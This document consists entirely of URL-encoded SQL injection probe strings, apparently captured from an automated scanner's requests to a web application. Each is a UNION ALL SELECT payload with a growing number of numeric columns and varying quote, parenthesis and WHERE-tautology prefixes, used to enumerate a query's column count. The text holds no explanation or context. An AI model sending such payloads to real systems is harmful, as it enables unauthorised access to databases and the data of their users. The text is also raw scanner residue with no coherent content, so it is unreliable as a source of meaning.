-9490%29%29%20UNION%20ALL%20SELECT%204723%2C4723%2C4723%2C4723%2C4723%2C4723%2C4723%2C4723%2C4723%2C4723%2C4723%2C4723%2C4723%2C4723%2C4723%2C4723%2C4723%2C4723%2C4723%2C4723%2C4723%2C4723%2C4723%2C4723%23 -3694%29%29%20UNION%20ALL%20SELECT%205055%2C5055%2C5055%2C5055%2C5055%2C5055%2C5055%2C5055%2C5055%2C5055%2C5055%2C5055%2C5055%2C5055%2C5055%2C5055%2C5055%2C5055%2C5055%2C5055%2C5055%2C5055%2C5055%2C5055%2C5055%23 -3194%29%29%20UNION%20ALL%20SELECT%202781%2C2781%2C2781%2C2781%2C2781%2C2781%2C2781%2C2781%2C2781%2C2781%2C2781%2C2781%2C2781%2C2781%2C2781%2C2781%2C2781%2C2781%2C2781%2C2781%2C2781%2C2781%2C2781%2C2781%2C2781%2C2781%23 -3608%29%29%20UNION%20ALL%20SELECT%207823%2C7823%2C7823%2C7823%2C7823%2C7823%2C7823%2C7823%2C7823%2C7823%2C7823%2C7823%2C7823%2C7823%2C7823%2C7823%2C7823%2C7823%2C7823%2C7823%2C7823%2C7823%2C7823%2C7823%2C7823%2C7823%2C7823%23 -9695%29%29%20UNION%20ALL%20SELECT%207876%2C7876%2C7876%2C7876%2C7876%2C7876%2C7876%2C7876%2C7876%2C7876%2C7876%2C7876%2C7876%2C7876%2C7876%2C7876%2C7876%2C7876%2C7876%2C7876%2C7876%2C7876%2C7876%2C7876%2C7876%2C7876%2C7876%2C7876%23 -5523%29%29%20UNION%20ALL%20SELECT%204866%2C4866%2C4866%2C4866%2C4866%2C4866%2C4866%2C4866%2C4866%2C4866%2C4866%2C4866%2C4866%2C4866%2C4866%2C4866%2C4866%2C4866%2C4866%2C4866%2C4866%2C4866%2C4866%2C4866%2C4866%2C4866%2C4866%2C4866%2C4866%23 -8805%29%29%20UNION%20ALL%20SELECT%202181%2C2181%2C2181%2C2181%2C2181%2C2181%2C2181%2C2181%2C2181%2C2181%2C2181%2C2181%2C2181%2C2181%2C2181%2C2181%2C2181%2C2181%2C2181%2C2181%2C2181%2C2181%2C2181%2C2181%2C2181%2C2181%2C2181%2C2181%2C2181%2C2181%23 -1366%29%29%29%20UNION%20ALL%20SELECT%202525%2C2525%2C2525%2C2525%2C2525%2C2525%2C2525%2C2525%2C2525%2C2525%2C2525%2C2525%2C2525%2C2525%2C2525%2C2525%2C2525%2C2525%2C2525%2C2525%2C2525%23 -6317%29%29%29%20UNION%20ALL%20SELECT%205144%2C5144%2C5144%2C5144%2C5144%2C5144%2C5144%2C5144%2C5144%2C5144%2C5144%2C5144%2C5144%2C5144%2C5144%2C5144%2C5144%2C5144%2C5144%2C5144%2C5144%2C5144%23 -5621%29%29%29%20UNION%20ALL%20SELECT%209921%2C9921%2C9921%2C9921%2C9921%2C9921%2C9921%2C9921%2C9921%2C9921%2C9921%2C9921%2C9921%2C9921%2C9921%2C9921%2C9921%2C9921%2C9921%2C9921%2C9921%2C9921%2C9921%23 -5663%29%29%29%20UNION%20ALL%20SELECT%207028%2C7028%2C7028%2C7028%2C7028%2C7028%2C7028%2C7028%2C7028%2C7028%2C7028%2C7028%2C7028%2C7028%2C7028%2C7028%2C7028%2C7028%2C7028%2C7028%2C7028%2C7028%2C7028%2C7028%23 -2577%29%29%29%20UNION%20ALL%20SELECT%201611%2C1611%2C1611%2C1611%2C1611%2C1611%2C1611%2C1611%2C1611%2C1611%2C1611%2C1611%2C1611%2C1611%2C1611%2C1611%2C1611%2C1611%2C1611%2C1611%2C1611%2C1611%2C1611%2C1611%2C1611%23 -9366%29%29%29%20UNION%20ALL%20SELECT%209217%2C9217%2C9217%2C9217%2C9217%2C9217%2C9217%2C9217%2C9217%2C9217%2C9217%2C9217%2C9217%2C9217%2C9217%2C9217%2C9217%2C9217%2C9217%2C9217%2C9217%2C9217%2C9217%2C9217%2C9217%2C9217%23 -4289%29%29%29%20UNION%20ALL%20SELECT%203479%2C3479%2C3479%2C3479%2C3479%2C3479%2C3479%2C3479%2C3479%2C3479%2C3479%2C3479%2C3479%2C3479%2C3479%2C3479%2C3479%2C3479%2C3479%2C3479%2C3479%2C3479%2C3479%2C3479%2C3479%2C3479%2C3479%23 -8199%29%29%29%20UNION%20ALL%20SELECT%208555%2C8555%2C8555%2C8555%2C8555%2C8555%2C8555%2C8555%2C8555%2C8555%2C8555%2C8555%2C8555%2C8555%2C8555%2C8555%2C8555%2C8555%2C8555%2C8555%2C8555%2C8555%2C8555%2C8555%2C8555%2C8555%2C8555%2C8555%23 -7421%29%29%29%20UNION%20ALL%20SELECT%203888%2C3888%2C3888%2C3888%2C3888%2C3888%2C3888%2C3888%2C3888%2C3888%2C3888%2C3888%2C3888%2C3888%2C3888%2C3888%2C3888%2C3888%2C3888%2C3888%2C3888%2C3888%2C3888%2C3888%2C3888%2C3888%2C3888%2C3888%2C3888%23 -7110%29%29%29%20UNION%20ALL%20SELECT%205021%2C5021%2C5021%2C5021%2C5021%2C5021%2C5021%2C5021%2C5021%2C5021%2C5021%2C5021%2C5021%2C5021%2C5021%2C5021%2C5021%2C5021%2C5021%2C5021%2C5021%2C5021%2C5021%2C5021%2C5021%2C5021%2C5021%2C5021%2C5021%2C5021%23 -9974%20UNION%20ALL%20SELECT%208337%2C8337%2C8337%2C8337%2C8337%2C8337%2C8337%2C8337%2C8337%2C8337%2C8337%2C8337%2C8337%2C8337%2C8337%2C8337%2C8337%2C8337%2C8337%2C8337%2C8337%23 -1945%20UNION%20ALL%20SELECT%206226%2C6226%2C6226%2C6226%2C6226%2C6226%2C6226%2C6226%2C6226%2C6226%2C6226%2C6226%2C6226%2C6226%2C6226%2C6226%2C6226%2C6226%2C6226%2C6226%2C6226%2C6226%23 -4994%20UNION%20ALL%20SELECT%201600%2C1600%2C1600%2C1600%2C1600%2C1600%2C1600%2C1600%2C1600%2C1600%2C1600%2C1600%2C1600%2C1600%2C1600%2C1600%2C1600%2C1600%2C1600%2C1600%2C1600%2C1600%2C1600%23 -3228%20UNION%20ALL%20SELECT%209985%2C9985%2C9985%2C9985%2C9985%2C9985%2C9985%2C9985%2C9985%2C9985%2C9985%2C9985%2C9985%2C9985%2C9985%2C9985%2C9985%2C9985%2C9985%2C9985%2C9985%2C9985%2C9985%2C9985%23 -3213%20UNION%20ALL%20SELECT%202245%2C2245%2C2245%2C2245%2C2245%2C2245%2C2245%2C2245%2C2245%2C2245%2C2245%2C2245%2C2245%2C2245%2C2245%2C2245%2C2245%2C2245%2C2245%2C2245%2C2245%2C2245%2C2245%2C2245%2C2245%23 -8904%20UNION%20ALL%20SELECT%206736%2C6736%2C6736%2C6736%2C6736%2C6736%2C6736%2C6736%2C6736%2C6736%2C6736%2C6736%2C6736%2C6736%2C6736%2C6736%2C6736%2C6736%2C6736%2C6736%2C6736%2C6736%2C6736%2C6736%2C6736%2C6736%23 -5604%20UNION%20ALL%20SELECT%204613%2C4613%2C4613%2C4613%2C4613%2C4613%2C4613%2C4613%2C4613%2C4613%2C4613%2C4613%2C4613%2C4613%2C4613%2C4613%2C4613%2C4613%2C4613%2C4613%2C4613%2C4613%2C4613%2C4613%2C4613%2C4613%2C4613%23 -7206%20UNION%20ALL%20SELECT%208222%2C8222%2C8222%2C8222%2C8222%2C8222%2C8222%2C8222%2C8222%2C8222%2C8222%2C8222%2C8222%2C8222%2C8222%2C8222%2C8222%2C8222%2C8222%2C8222%2C8222%2C8222%2C8222%2C8222%2C8222%2C8222%2C8222%2C8222%23 -3988%20UNION%20ALL%20SELECT%202435%2C2435%2C2435%2C2435%2C2435%2C2435%2C2435%2C2435%2C2435%2C2435%2C2435%2C2435%2C2435%2C2435%2C2435%2C2435%2C2435%2C2435%2C2435%2C2435%2C2435%2C2435%2C2435%2C2435%2C2435%2C2435%2C2435%2C2435%2C2435%23 -7848%20UNION%20ALL%20SELECT%209923%2C9923%2C9923%2C9923%2C9923%2C9923%2C9923%2C9923%2C9923%2C9923%2C9923%2C9923%2C9923%2C9923%2C9923%2C9923%2C9923%2C9923%2C9923%2C9923%2C9923%2C9923%2C9923%2C9923%2C9923%2C9923%2C9923%2C9923%2C9923%2C9923%23 -8830%29%20WHERE%204529%3D4529%20UNION%20ALL%20SELECT%204529%2C4529%2C4529%2C4529%2C4529%2C4529%2C4529%2C4529%2C4529%2C4529%2C4529%2C4529%2C4529%2C4529%2C4529%2C4529%2C4529%2C4529%2C4529%2C4529%2C4529%23 -7526%29%20WHERE%206924%3D6924%20UNION%20ALL%20SELECT%206924%2C6924%2C6924%2C6924%2C6924%2C6924%2C6924%2C6924%2C6924%2C6924%2C6924%2C6924%2C6924%2C6924%2C6924%2C6924%2C6924%2C6924%2C6924%2C6924%2C6924%2C6924%23 -4446%29%20WHERE%204054%3D4054%20UNION%20ALL%20SELECT%204054%2C4054%2C4054%2C4054%2C4054%2C4054%2C4054%2C4054%2C4054%2C4054%2C4054%2C4054%2C4054%2C4054%2C4054%2C4054%2C4054%2C4054%2C4054%2C4054%2C4054%2C4054%2C4054%23 -2117%29%20WHERE%201036%3D1036%20UNION%20ALL%20SELECT%201036%2C1036%2C1036%2C1036%2C1036%2C1036%2C1036%2C1036%2C1036%2C1036%2C1036%2C1036%2C1036%2C1036%2C1036%2C1036%2C1036%2C1036%2C1036%2C1036%2C1036%2C1036%2C1036%2C1036%23 -1902%29%20WHERE%204960%3D4960%20UNION%20ALL%20SELECT%204960%2C4960%2C4960%2C4960%2C4960%2C4960%2C4960%2C4960%2C4960%2C4960%2C4960%2C4960%2C4960%2C4960%2C4960%2C4960%2C4960%2C4960%2C4960%2C4960%2C4960%2C4960%2C4960%2C4960%2C4960%23 -8035%29%20WHERE%206726%3D6726%20UNION%20ALL%20SELECT%206726%2C6726%2C6726%2C6726%2C6726%2C6726%2C6726%2C6726%2C6726%2C6726%2C6726%2C6726%2C6726%2C6726%2C6726%2C6726%2C6726%2C6726%2C6726%2C6726%2C6726%2C6726%2C6726%2C6726%2C6726%2C6726%23 -1076%29%20WHERE%203377%3D3377%20UNION%20ALL%20SELECT%203377%2C3377%2C3377%2C3377%2C3377%2C3377%2C3377%2C3377%2C3377%2C3377%2C3377%2C3377%2C3377%2C3377%2C3377%2C3377%2C3377%2C3377%2C3377%2C3377%2C3377%2C3377%2C3377%2C3377%2C3377%2C3377%2C3377%23 -6786%29%20WHERE%206438%3D6438%20UNION%20ALL%20SELECT%206438%2C6438%2C6438%2C6438%2C6438%2C6438%2C6438%2C6438%2C6438%2C6438%2C6438%2C6438%2C6438%2C6438%2C6438%2C6438%2C6438%2C6438%2C6438%2C6438%2C6438%2C6438%2C6438%2C6438%2C6438%2C6438%2C6438%2C6438%23 -7636%29%20WHERE%201070%3D1070%20UNION%20ALL%20SELECT%201070%2C1070%2C1070%2C1070%2C1070%2C1070%2C1070%2C1070%2C1070%2C1070%2C1070%2C1070%2C1070%2C1070%2C1070%2C1070%2C1070%2C1070%2C1070%2C1070%2C1070%2C1070%2C1070%2C1070%2C1070%2C1070%2C1070%2C1070%2C1070%23 -7714%29%20WHERE%205304%3D5304%20UNION%20ALL%20SELECT%205304%2C5304%2C5304%2C5304%2C5304%2C5304%2C5304%2C5304%2C5304%2C5304%2C5304%2C5304%2C5304%2C5304%2C5304%2C5304%2C5304%2C5304%2C5304%2C5304%2C5304%2C5304%2C5304%2C5304%2C5304%2C5304%2C5304%2C5304%2C5304%2C5304%23 -7453%20WHERE%209232%3D9232%20UNION%20ALL%20SELECT%209232%2C9232%2C9232%2C9232%2C9232%2C9232%2C9232%2C9232%2C9232%2C9232%2C9232%2C9232%2C9232%2C9232%2C9232%2C9232%2C9232%2C9232%2C9232%2C9232%2C9232%23 -4277%20WHERE%206557%3D6557%20UNION%20ALL%20SELECT%206557%2C6557%2C6557%2C6557%2C6557%2C6557%2C6557%2C6557%2C6557%2C6557%2C6557%2C6557%2C6557%2C6557%2C6557%2C6557%2C6557%2C6557%2C6557%2C6557%2C6557%2C6557%23 -9194%20WHERE%206877%3D6877%20UNION%20ALL%20SELECT%206877%2C6877%2C6877%2C6877%2C6877%2C6877%2C6877%2C6877%2C6877%2C6877%2C6877%2C6877%2C6877%2C6877%2C6877%2C6877%2C6877%2C6877%2C6877%2C6877%2C6877%2C6877%2C6877%23 -6588%20WHERE%205044%3D5044%20UNION%20ALL%20SELECT%205044%2C5044%2C5044%2C5044%2C5044%2C5044%2C5044%2C5044%2C5044%2C5044%2C5044%2C5044%2C5044%2C5044%2C5044%2C5044%2C5044%2C5044%2C5044%2C5044%2C5044%2C5044%2C5044%2C5044%23 -8169%20WHERE%203478%3D3478%20UNION%20ALL%20SELECT%203478%2C3478%2C3478%2C3478%2C3478%2C3478%2C3478%2C3478%2C3478%2C3478%2C3478%2C3478%2C3478%2C3478%2C3478%2C3478%2C3478%2C3478%2C3478%2C3478%2C3478%2C3478%2C3478%2C3478%2C3478%23 -7232%20WHERE%203365%3D3365%20UNION%20ALL%20SELECT%203365%2C3365%2C3365%2C3365%2C3365%2C3365%2C3365%2C3365%2C3365%2C3365%2C3365%2C3365%2C3365%2C3365%2C3365%2C3365%2C3365%2C3365%2C3365%2C3365%2C3365%2C3365%2C3365%2C3365%2C3365%2C3365%23 -2724%20WHERE%208787%3D8787%20UNION%20ALL%20SELECT%208787%2C8787%2C8787%2C8787%2C8787%2C8787%2C8787%2C8787%2C8787%2C8787%2C8787%2C8787%2C8787%2C8787%2C8787%2C8787%2C8787%2C8787%2C8787%2C8787%2C8787%2C8787%2C8787%2C8787%2C8787%2C8787%2C8787%23 -9802%20WHERE%202443%3D2443%20UNION%20ALL%20SELECT%202443%2C2443%2C2443%2C2443%2C2443%2C2443%2C2443%2C2443%2C2443%2C2443%2C2443%2C2443%2C2443%2C2443%2C2443%2C2443%2C2443%2C2443%2C2443%2C2443%2C2443%2C2443%2C2443%2C2443%2C2443%2C2443%2C2443%2C2443%23 -5954%20WHERE%208187%3D8187%20UNION%20ALL%20SELECT%208187%2C8187%2C8187%2C8187%2C8187%2C8187%2C8187%2C8187%2C8187%2C8187%2C8187%2C8187%2C8187%2C8187%2C8187%2C8187%2C8187%2C8187%2C8187%2C8187%2C8187%2C8187%2C8187%2C8187%2C8187%2C8187%2C8187%2C8187%2C8187%23 -9981%20WHERE%203652%3D3652%20UNION%20ALL%20SELECT%203652%2C3652%2C3652%2C3652%2C3652%2C3652%2C3652%2C3652%2C3652%2C3652%2C3652%2C3652%2C3652%2C3652%2C3652%2C3652%2C3652%2C3652%2C3652%2C3652%2C3652%2C3652%2C3652%2C3652%2C3652%2C3652%2C3652%2C3652%2C3652%2C3652%23 -5797%27%29%20UNION%20ALL%20SELECT%204562%2C4562%2C4562%2C4562%2C4562%2C4562%2C4562%2C4562%2C4562%2C4562%2C4562%2C4562%2C4562%2C4562%2C4562%2C4562%2C4562%2C4562%2C4562%2C4562%2C4562%23 -8345%27%29%20UNION%20ALL%20SELECT%201826%2C1826%2C1826%2C1826%2C1826%2C1826%2C1826%2C1826%2C1826%2C1826%2C1826%2C1826%2C1826%2C1826%2C1826%2C1826%2C1826%2C1826%2C1826%2C1826%2C1826%2C1826%23 -2885%27%29%20UNION%20ALL%20SELECT%209450%2C9450%2C9450%2C9450%2C9450%2C9450%2C9450%2C9450%2C9450%2C9450%2C9450%2C9450%2C9450%2C9450%2C9450%2C9450%2C9450%2C9450%2C9450%2C9450%2C9450%2C9450%2C9450%23 -5543%27%29%20UNION%20ALL%20SELECT%201157%2C1157%2C1157%2C1157%2C1157%2C1157%2C1157%2C1157%2C1157%2C1157%2C1157%2C1157%2C1157%2C1157%2C1157%2C1157%2C1157%2C1157%2C1157%2C1157%2C1157%2C1157%2C1157%2C1157%23 -6607%27%29%20UNION%20ALL%20SELECT%201289%2C1289%2C1289%2C1289%2C1289%2C1289%2C1289%2C1289%2C1289%2C1289%2C1289%2C1289%2C1289%2C1289%2C1289%2C1289%2C1289%2C1289%2C1289%2C1289%2C1289%2C1289%2C1289%2C1289%2C1289%23 -1608%27%29%20UNION%20ALL%20SELECT%206239%2C6239%2C6239%2C6239%2C6239%2C6239%2C6239%2C6239%2C6239%2C6239%2C6239%2C6239%2C6239%2C6239%2C6239%2C6239%2C6239%2C6239%2C6239%2C6239%2C6239%2C6239%2C6239%2C6239%2C6239%2C6239%23 -7257%27%29%20UNION%20ALL%20SELECT%207508%2C7508%2C7508%2C7508%2C7508%2C7508%2C7508%2C7508%2C7508%2C7508%2C7508%2C7508%2C7508%2C7508%2C7508%2C7508%2C7508%2C7508%2C7508%2C7508%2C7508%2C7508%2C7508%2C7508%2C7508%2C7508%2C7508%23 -3076%27%29%20UNION%20ALL%20SELECT%203547%2C3547%2C3547%2C3547%2C3547%2C3547%2C3547%2C3547%2C3547%2C3547%2C3547%2C3547%2C3547%2C3547%2C3547%2C3547%2C3547%2C3547%2C3547%2C3547%2C3547%2C3547%2C3547%2C3547%2C3547%2C3547%2C3547%2C3547%23 -5189%27%29%20UNION%20ALL%20SELECT%201404%2C1404%2C1404%2C1404%2C1404%2C1404%2C1404%2C1404%2C1404%2C1404%2C1404%2C1404%2C1404%2C1404%2C1404%2C1404%2C1404%2C1404%2C1404%2C1404%2C1404%2C1404%2C1404%2C1404%2C1404%2C1404%2C1404%2C1404%2C1404%23 -4848%27%29%20UNION%20ALL%20SELECT%204239%2C4239%2C4239%2C4239%2C4239%2C4239%2C4239%2C4239%2C4239%2C4239%2C4239%2C4239%2C4239%2C4239%2C4239%2C4239%2C4239%2C4239%2C4239%2C4239%2C4239%2C4239%2C4239%2C4239%2C4239%2C4239%2C4239%2C4239%2C4239%2C4239%23 -9333%27%20UNION%20ALL%20SELECT%204906%2C4906%2C4906%2C4906%2C4906%2C4906%2C4906%2C4906%2C4906%2C4906%2C4906%2C4906%2C4906%2C4906%2C4906%2C4906%2C4906%2C4906%2C4906%2C4906%2C4906%23 -9973%27%20UNION%20ALL%20SELECT%204978%2C4978%2C4978%2C4978%2C4978%2C4978%2C4978%2C4978%2C4978%2C4978%2C4978%2C4978%2C4978%2C4978%2C4978%2C4978%2C4978%2C4978%2C4978%2C4978%2C4978%2C4978%23 -4843%27%20UNION%20ALL%20SELECT%201165%2C1165%2C1165%2C1165%2C1165%2C1165%2C1165%2C1165%2C1165%2C1165%2C1165%2C1165%2C1165%2C1165%2C1165%2C1165%2C1165%2C1165%2C1165%2C1165%2C1165%2C1165%2C1165%23 -4088%27%20UNION%20ALL%20SELECT%208508%2C8508%2C8508%2C8508%2C8508%2C8508%2C8508%2C8508%2C8508%2C8508%2C8508%2C8508%2C8508%2C8508%2C8508%2C8508%2C8508%2C8508%2C8508%2C8508%2C8508%2C8508%2C8508%2C8508%23 -7583%27%20UNION%20ALL%20SELECT%203227%2C3227%2C3227%2C3227%2C3227%2C3227%2C3227%2C3227%2C3227%2C3227%2C3227%2C3227%2C3227%2C3227%2C3227%2C3227%2C3227%2C3227%2C3227%2C3227%2C3227%2C3227%2C3227%2C3227%2C3227%23 -3973%27%20UNION%20ALL%20SELECT%206477%2C6477%2C6477%2C6477%2C6477%2C6477%2C6477%2C6477%2C6477%2C6477%2C6477%2C6477%2C6477%2C6477%2C6477%2C6477%2C6477%2C6477%2C6477%2C6477%2C6477%2C6477%2C6477%2C6477%2C6477%2C6477%23 -1406%27%20UNION%20ALL%20SELECT%209169%2C9169%2C9169%2C9169%2C9169%2C9169%2C9169%2C9169%2C9169%2C9169%2C9169%2C9169%2C9169%2C9169%2C9169%2C9169%2C9169%2C9169%2C9169%2C9169%2C9169%2C9169%2C9169%2C9169%2C9169%2C9169%2C9169%23 -9726%27%20UNION%20ALL%20SELECT%208715%2C8715%2C8715%2C8715%2C8715%2C8715%2C8715%2C8715%2C8715%2C8715%2C8715%2C8715%2C8715%2C8715%2C8715%2C8715%2C8715%2C8715%2C8715%2C8715%2C8715%2C8715%2C8715%2C8715%2C8715%2C8715%2C8715%2C8715%23 -7883%27%20UNION%20ALL%20SELECT%202916%2C2916%2C2916%2C2916%2C2916%2C2916%2C2916%2C2916%2C2916%2C2916%2C2916%2C2916%2C2916%2C2916%2C2916%2C2916%2C2916%2C2916%2C2916%2C2916%2C2916%2C2916%2C2916%2C2916%2C2916%2C2916%2C2916%2C2916%2C2916%23 -5434%27%20UNION%20ALL%20SELECT%208320%2C8320%2C8320%2C8320%2C8320%2C8320%2C8320%2C8320%2C8320%2C8320%2C8320%2C8320%2C8320%2C8320%2C8320%2C8320%2C8320%2C8320%2C8320%2C8320%2C8320%2C8320%2C8320%2C8320%2C8320%2C8320%2C8320%2C8320%2C8320%2C8320%23 -5325%22%20UNION%20ALL%20SELECT%205766%2C5766%2C5766%2C5766%2C5766%2C5766%2C5766%2C5766%2C5766%2C5766%2C5766%2C5766%2C5766%2C5766%2C5766%2C5766%2C5766%2C5766%2C5766%2C5766%2C5766%23 -9063%22%20UNION%20ALL%20SELECT%206510%2C6510%2C6510%2C6510%2C6510%2C6510%2C6510%2C6510%2C6510%2C6510%2C6510%2C6510%2C6510%2C6510%2C6510%2C6510%2C6510%2C6510%2C6510%2C6510%2C6510%2C6510%23 -1122%22%20UNION%20ALL%20SELECT%202382%2C2382%2C2382%2C2382%2C2382%2C2382%2C2382%2C2382%2C2382%2C2382%2C2382%2C2382%2C2382%2C2382%2C2382%2C2382%2C2382%2C2382%2C2382%2C2382%2C2382%2C2382%2C2382%23 -1677%22%20UNION%20ALL%20SELECT%203340%2C3340%2C3340%2C3340%2C3340%2C3340%2C3340%2C3340%2C3340%2C3340%2C3340%2C3340%2C3340%2C3340%2C3340%2C3340%2C3340%2C3340%2C3340%2C3340%2C3340%2C3340%2C3340%2C3340%23 -2658%22%20UNION%20ALL%20SELECT%207555%2C7555%2C7555%2C7555%2C7555%2C7555%2C7555%2C7555%2C7555%2C7555%2C7555%2C7555%2C7555%2C7555%2C7555%2C7555%2C7555%2C7555%2C7555%2C7555%2C7555%2C7555%2C7555%2C7555%2C7555%23 -8278%22%20UNION%20ALL%20SELECT%204046%2C4046%2C4046%2C4046%2C4046%2C4046%2C4046%2C4046%2C4046%2C4046%2C4046%2C4046%2C4046%2C4046%2C4046%2C4046%2C4046%2C4046%2C4046%2C4046%2C4046%2C4046%2C4046%2C4046%2C4046%2C4046%23 -7395%22%20UNION%20ALL%20SELECT%204849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849%2C4849%23 -8947%22%20UNION%20ALL%20SELECT%205965%2C5965%2C5965%2C5965%2C5965%2C5965%2C5965%2C5965%2C5965%2C5965%2C5965%2C5965%2C5965%2C5965%2C5965%2C5965%2C5965%2C5965%2C5965%2C5965%2C5965%2C5965%2C5965%2C5965%2C5965%2C5965%2C5965%2C5965%23 -6046%22%20UNION%20ALL%20SELECT%206207%2C6207%2C6207%2C6207%2C6207%2C6207%2C6207%2C6207%2C6207%2C6207%2C6207%2C6207%2C6207%2C6207%2C6207%2C6207%2C6207%2C6207%2C6207%2C6207%2C6207%2C6207%2C6207%2C6207%2C6207%2C6207%2C6207%2C6207%2C6207%23 -8507%22%20UNION%20ALL%20SELECT%209693%2C9693%2C9693%2C9693%2C9693%2C9693%2C9693%2C9693%2C9693%2C9693%2C9693%2C9693%2C9693%2C9693%2C9693%2C9693%2C9693%2C9693%2C9693%2C9693%2C9693%2C9693%2C9693%2C9693%2C9693%2C9693%2C9693%2C9693%2C9693%2C9693%23 -4459%27%29%20UNION%20ALL%20SELECT%207560%2C7560%2C7560%2C7560%2C7560%2C7560%2C7560%2C7560%2C7560%2C7560%2C7560%2C7560%2C7560%2C7560%2C7560%2C7560%2C7560%2C7560%2C7560%2C7560%2C7560%23 -1104%27%29%20UNION%20ALL%20SELECT%207253%2C7253%2C7253%2C7253%2C7253%2C7253%2C7253%2C7253%2C7253%2C7253%2C7253%2C7253%2C7253%2C7253%2C7253%2C7253%2C7253%2C7253%2C7253%2C7253%2C7253%2C7253%23 -3323%27%29%20UNION%20ALL%20SELECT%207232%2C7232%2C7232%2C7232%2C7232%2C7232%2C7232%2C7232%2C7232%2C7232%2C7232%2C7232%2C7232%2C7232%2C7232%2C7232%2C7232%2C7232%2C7232%2C7232%2C7232%2C7232%2C7232%23 -8411%27%29%20UNION%20ALL%20SELECT%206820%2C6820%2C6820%2C6820%2C6820%2C6820%2C6820%2C6820%2C6820%2C6820%2C6820%2C6820%2C6820%2C6820%2C6820%2C6820%2C6820%2C6820%2C6820%2C6820%2C6820%2C6820%2C6820%2C6820%23 -6442%27%29%20UNION%20ALL%20SELECT%205962%2C5962%2C5962%2C5962%2C5962%2C5962%2C5962%2C5962%2C5962%2C5962%2C5962%2C5962%2C5962%2C5962%2C5962%2C5962%2C5962%2C5962%2C5962%2C5962%2C5962%2C5962%2C5962%2C5962%2C5962%23 -3735%27%29%20UNION%20ALL%20SELECT%204920%2C4920%2C4920%2C4920%2C4920%2C4920%2C4920%2C4920%2C4920%2C4920%2C4920%2C4920%2C4920%2C4920%2C4920%2C4920%2C4920%2C4920%2C4920%2C4920%2C4920%2C4920%2C4920%2C4920%2C4920%2C4920%23 -7483%27%29%20UNION%20ALL%20SELECT%204607%2C4607%2C4607%2C4607%2C4607%2C4607%2C4607%2C4607%2C4607%2C4607%2C4607%2C4607%2C4607%2C4607%2C4607%2C4607%2C4607%2C4607%2C4607%2C4607%2C4607%2C4607%2C4607%2C4607%2C4607%2C4607%2C4607%23 -1539%27%29%20UNION%20ALL%20SELECT%206920%2C6920%2C6920%2C6920%2C6920%2C6920%2C6920%2C6920%2C6920%2C6920%2C6920%2C6920%2C6920%2C6920%2C6920%2C6920%2C6920%2C6920%2C6920%2C6920%2C6920%2C6920%2C6920%2C6920%2C6920%2C6920%2C6920%2C6920%23 -6934%27%29%20UNION%20ALL%20SELECT%208006%2C8006%2C8006%2C8006%2C8006%2C8006%2C8006%2C8006%2C8006%2C8006%2C8006%2C8006%2C8006%2C8006%2C8006%2C8006%2C8006%2C8006%2C8006%2C8006%2C8006%2C8006%2C8006%2C8006%2C8006%2C8006%2C8006%2C8006%2C8006%23 -3825%27%29%20UNION%20ALL%20SELECT%205092%2C5092%2C5092%2C5092%2C5092%2C5092%2C5092%2C5092%2C5092%2C5092%2C5092%2C5092%2C5092%2C5092%2C5092%2C5092%2C5092%2C5092%2C5092%2C5092%2C5092%2C5092%2C5092%2C5092%2C5092%2C5092%2C5092%2C5092%2C5092%2C5092%23 -1109%27%29%29%20UNION%20ALL%20SELECT%201419%2C1419%2C1419%2C1419%2C1419%2C1419%2C1419%2C1419%2C1419%2C1419%2C1419%2C1419%2C1419%2C1419%2C1419%2C1419%2C1419%2C1419%2C1419%2C1419%2C1419%23 -7449%27%29%29%20UNION%20ALL%20SELECT%205570%2C5570%2C5570%2C5570%2C5570%2C5570%2C5570%2C5570%2C5570%2C5570%2C5570%2C5570%2C5570%2C5570%2C5570%2C5570%2C5570%2C5570%2C5570%2C5570%2C5570%2C5570%23 -3049%27%29%29%20UNION%20ALL%20SELECT%202080%2C2080%2C2080%2C2080%2C2080%2C2080%2C2080%2C2080%2C2080%2C2080%2C2080%2C2080%2C2080%2C2080%2C2080%2C2080%2C2080%2C2080%2C2080%2C2080%2C2080%2C2080%2C2080%23 -1712%27%29%29%20UNION%20ALL%20SELECT%205524%2C5524%2C5524%2C5524%2C5524%2C5524%2C5524%2C5524%2C5524%2C5524%2C5524%2C5524%2C5524%2C5524%2C5524%2C5524%2C5524%2C5524%2C5524%2C5524%2C5524%2C5524%2C5524%2C5524%23 -2100%27%29%29%20UNION%20ALL%20SELECT%208719%2C8719%2C8719%2C8719%2C8719%2C8719%2C8719%2C8719%2C8719%2C8719%2C8719%2C8719%2C8719%2C8719%2C8719%2C8719%2C8719%2C8719%2C8719%2C8719%2C8719%2C8719%2C8719%2C8719%2C8719%23 -7148%27%29%29%20UNION%20ALL%20SELECT%202900%2C2900%2C2900%2C2900%2C2900%2C2900%2C2900%2C2900%2C2900%2C2900%2C2900%2C2900%2C2900%2C2900%2C2900%2C2900%2C2900%2C2900%2C2900%2C2900%2C2900%2C2900%2C2900%2C2900%2C2900%2C2900%23 -6791%27%29%29%20UNION%20ALL%20SELECT%206731%2C6731%2C6731%2C6731%2C6731%2C6731%2C6731%2C6731%2C6731%2C6731%2C6731%2C6731%2C6731%2C6731%2C6731%2C6731%2C6731%2C6731%2C6731%2C6731%2C6731%2C6731%2C6731%2C6731%2C6731%2C6731%2C6731%23 -4896%27%29%29%20UNION%20ALL%20SELECT%206132%2C6132%2C6132%2C6132%2C6132%2C6132%2C6132%2C6132%2C6132%2C6132%2C6132%2C6132%2C6132%2C6132%2C6132%2C6132%2C6132%2C6132%2C6132%2C6132%2C6132%2C6132%2C6132%2C6132%2C6132%2C6132%2C6132%2C6132%23 -6192%27%29%29%20UNION%20ALL%20SELECT%208062%2C8062%2C8062%2C8062%2C8062%2C8062%2C8062%2C8062%2C8062%2C8062%2C8062%2C8062%2C8062%2C8062%2C8062%2C8062%2C8062%2C8062%2C8062%2C8062%2C8062%2C8062%2C8062%2C8062%2C8062%2C8062%2C8062%2C8062%2C8062%23 -6522%27%29%29%20UNION%20ALL%20SELECT%203129%2C3129%2C3129%2C3129%2C3129%2C3129%2C3129%2C3129%2C3129%2C3129%2C3129%2C3129%2C3129%2C3129%2C3129%2C3129%2C3129%2C3129%2C3129%2C3129%2C3129%2C3129%2C3129%2C3129%2C3129%2C3129%2C3129%2C3129%2C3129%2C3129%23 